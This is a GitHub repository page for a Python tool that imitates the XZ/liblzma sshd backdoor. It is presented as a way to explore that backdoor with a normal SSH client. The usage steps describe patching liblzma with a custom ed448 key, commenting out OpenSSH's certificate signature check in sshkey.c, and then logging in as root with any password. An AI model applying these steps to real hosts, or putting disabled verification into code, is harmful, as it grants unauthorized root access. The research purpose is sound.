schrodyn / JiaTansSSHAgent

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Jia Tan's SSH Agent

Simple SSH Agent that implements some of the XZ sshd backdoor functionality.

For those who want to more easily explore the backdoor using a typical SSH client.

demo

Usage

  • Generate your own ed448 private key: openssl genpkey -algorithm ED448 -outform PEM -out privkey.pem
  • Patch your liblzma.so with a custom ed448 public key
  • Patch your SSH client to skip verification of the certificate:
    • Look for this section in openssh's sshkey.c and commment it out:
    if ((ret = sshkey_verify(key->cert->signature_key, sig, slen,
               sshbuf_ptr(key->cert->certblob), signed_len, NULL, 0, NULL)) != 0)
    {
    	goto out;
    }
  • python3 -m virtualenv venv && . venv/bin/activate && pip install -r requirements.txt
  • python3 agent.py /tmp/agent ./privkey.pem
  • SSH_AUTH_SOCK=/tmp/agent ./ssh root@localhost
  • log in with any password :)

-- blasty <peter@haxx.in>

About


Languages

Language:Python 100.0%